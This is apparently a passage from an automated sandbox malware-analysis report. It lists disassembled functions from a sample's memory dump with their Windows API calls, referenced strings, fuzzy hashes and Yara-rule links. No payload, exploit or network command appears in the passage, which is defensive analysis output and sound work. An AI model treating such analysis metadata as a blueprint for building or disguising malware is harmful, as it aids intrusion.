                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0158f27dcf94b3dadb21a6974c3f1d872741fb9abe1333ffc0c14770d1f40fdd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C115A76910618FFDB218F64CC80EAF7BBCEF00B60B104419E801E7250E2719E41FB60
                                                                                                                                                                                                                                                                                        Function 00F0F6D0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • Variable must be of type 'Object'., xrefs: 00F548C6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                                                                                                        • API String ID: 0-109567571
                                                                                                                                                                                                                                                                                        • Opcode ID: b08975d5f7dc9def1ff08fb366e8160441ccd0ea2170ada7206ed7c1752a9ccf
                                                                                                                                                                                                                                                                                        • Instruction ID: 03d5fa7a346361153d8dc3e046075007f25e6df06cf6cc26728e84d8c50b65f4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b08975d5f7dc9def1ff08fb366e8160441ccd0ea2170ada7206ed7c1752a9ccf
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4C2AE71E00219DFCB24CF58D880BADB7B1BF08314F24816AE905AB791D779AD85FB91
                                                                                                                                                                                                                                                                                        Function 00F10340 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00F115F2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 849a1e0115f56eca53830c955386274b7baf4e789712078824955d080945973f
                                                                                                                                                                                                                                                                                        • Instruction ID: d0e83e79d1ef77ea0864de7c5d32895e4641c76ac896c95ddcd7db4723eebf39
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 849a1e0115f56eca53830c955386274b7baf4e789712078824955d080945973f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69B29A75A08301CFCB24CF14C490A6AB7E1BF99310F14491DEA958B391DBB5ED85EB92
                                                                                                                                                                                                                                                                                        Function 00F2014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00F209D8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F23614: RaiseException.KERNEL32(?,?,?,00F209FA,?,00000000,?,?,?,?,?,?,00F209FA,00000000,00FC9758,00000000), ref: 00F23674
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00F209F5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                        • String ID: Unknown exception
                                                                                                                                                                                                                                                                                        • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                        • Opcode ID: 50d4b970d9bda0f05f921ea0bf1f228d4e54884723aa382f462f374f16b4a94a
                                                                                                                                                                                                                                                                                        • Instruction ID: 90d4cfdf86c844cd4c3d16bfcd0a8528230c28b4b5da03e88d01f369172f187b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 50d4b970d9bda0f05f921ea0bf1f228d4e54884723aa382f462f374f16b4a94a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2F0C836D0021DB78B00BAA4FC46E9E7B6C5E00360B604164B915D66E3FF78E665F5D1
                                                                                                                                                                                                                                                                                        Function 00F889B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00F88D52
                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00F88D59
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 00F88F3A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 146820519-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c6d64b359bc3ffad99f1ec76eacc16fbbb3dcd417ef2a8bc92ea355ceceaa275
                                                                                                                                                                                                                                                                                        • Instruction ID: 44331dfe7da8fcd1bfcbcb47ff2e4edb09a877381f01f0d452f5e36c880bf2d7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c6d64b359bc3ffad99f1ec76eacc16fbbb3dcd417ef2a8bc92ea355ceceaa275
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F127B71A083019FC714DF28C484B6ABBE1FF85364F54895DE8898B392CB35E946DB92
                                                                                                                                                                                                                                                                                        Function 00F89AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 306214811-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d5bf62bc3466a15b8d23d089fe0e510a47ece57625757c02614dcec27291280e
                                                                                                                                                                                                                                                                                        • Instruction ID: 4ccab0d1d3751bf2624f293cd2acc6a7c55435346e18363ba6b16d87be4fac21
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5bf62bc3466a15b8d23d089fe0e510a47ece57625757c02614dcec27291280e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5A19E31604505EFCB18EF58D5C19B9B7A1FF46314B6484ADE84A8F392CB76ED42EB80
                                                                                                                                                                                                                                                                                        Function 00F02793 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F032AF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F032B7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F032C2
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F032CD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F032D5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F032DD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F03205: RegisterWindowMessageW.USER32(00000004,?,00F02964), ref: 00F0325D
                                                                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F02A0A
                                                                                                                                                                                                                                                                                        • OleInitialize.OLE32 ref: 00F02A28
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 00F43A0D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                                        • Opcode ID: eb3ae9652de4a80082085286acb2bcf5d0090b78ce4faf4099c2c40b71d26d51
                                                                                                                                                                                                                                                                                        • Instruction ID: 9d17afb235ac9233b98624525cb9a8fb076fa870678405a46149e6e7723f6b14
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb3ae9652de4a80082085286acb2bcf5d0090b78ce4faf4099c2c40b71d26d51
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5271ADB09022088ED7C8EF79BD65B197BE2BB69301358426BD408C73A2EB744541FFE4
                                                                                                                                                                                                                                                                                        Function 00F1FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F061A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F06299
                                                                                                                                                                                                                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00F1FD36
                                                                                                                                                                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F1FD45
                                                                                                                                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F5FE33
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d6a0eec5c01420870b278d7490c6635cc54dfaee05c6aaf9586db7bc04f1a617
                                                                                                                                                                                                                                                                                        • Instruction ID: 0bade6842f50063137853e2f2a60c4229f52fde86d50986cb44c22e91fec2996
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6a0eec5c01420870b278d7490c6635cc54dfaee05c6aaf9586db7bc04f1a617
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A319871904344AFEB72CF249855BE7BBFCAB12315F10049EDA9A97142C3741A8DEB51
                                                                                                                                                                                                                                                                                        Function 00F38A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,?,00F3894C,?,00FC9CE8,0000000C), ref: 00F38A84
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00F3894C,?,00FC9CE8,0000000C), ref: 00F38A8E
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00F38AB9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2583163307-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 51ca6b84c5549ce03a2ae502acc307ae60f19a24ad5b3fb7d2c23efc5ab0f9ee
                                                                                                                                                                                                                                                                                        • Instruction ID: ab1764d1ba4c8890a4a364abf1dce1f33459c89a40f2f61fcf6cab1d21cebdd0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51ca6b84c5549ce03a2ae502acc307ae60f19a24ad5b3fb7d2c23efc5ab0f9ee
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5010432E053647ADE246374AC46B7E77494BC2BB4F29021BF8148B2D2DF3D89827590
                                                                                                                                                                                                                                                                                        Function 00F3970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00F397BA,FF8BC369,00000000,00000002,00000000), ref: 00F39744
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00F397BA,FF8BC369,00000000,00000002,00000000,?,00F35ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00F26F41), ref: 00F3974E
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00F39755
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 846dec309671b530c911c8524ce96a76f54fe12b057907c50976a87bf2d59c04
                                                                                                                                                                                                                                                                                        • Instruction ID: 8475b6f52b09a4279173f90e9cd2eed8409f7d66aa16b640f42888612b8eda9e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 846dec309671b530c911c8524ce96a76f54fe12b057907c50976a87bf2d59c04
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF014C33A34118ABCB159FA9EC45DAE7B2AEB85330F240219F811871D0EAB1DD41BBD0
                                                                                                                                                                                                                                                                                        Function 00F0F238 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00F0F27B
                                                                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00F0F289
                                                                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F0F29F
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00F0F2B1
                                                                                                                                                                                                                                                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00F532D8
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3288985973-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6fdeb90cceff50df438b30593ec61a0e022475feb0bca6696bae96be4a3c3f27
                                                                                                                                                                                                                                                                                        • Instruction ID: 007026ba70a486577fbf5ecfe44f19d705001e955c3f60a8595ebd1164d733a6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6fdeb90cceff50df438b30593ec61a0e022475feb0bca6696bae96be4a3c3f27
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30F082306053489BE770CBA4CC49FDA33ADEB84361F10492AE609C30C0DB30A588FB26
                                                                                                                                                                                                                                                                                        Function 00F12B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00F13006
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                        • String ID: CALL
                                                                                                                                                                                                                                                                                        • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                                        • Opcode ID: b23d6ad2bf74430cca9dbfb50a9c80a72daa0dcf57365b4cbb424198555084cf
                                                                                                                                                                                                                                                                                        • Instruction ID: 99cd3c18bc2291e42a54f94dd7ba0975e6082c6f737e231fcd0af81bf1836e54
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b23d6ad2bf74430cca9dbfb50a9c80a72daa0dcf57365b4cbb424198555084cf
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1022DE706083019FC714DF14D884B6ABBF1BF88314F14895DF9868B3A2D735E995EB92
                                                                                                                                                                                                                                                                                        Function 00F11990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 65e21c04ba691d82f3a98fdd3d20a19955fb3364cb913630bf425a29b3bb702a
                                                                                                                                                                                                                                                                                        • Instruction ID: a17ef71353aa052d932785b238a17d5ad01ecf22e4f31e6adfdc1ca119a6df04
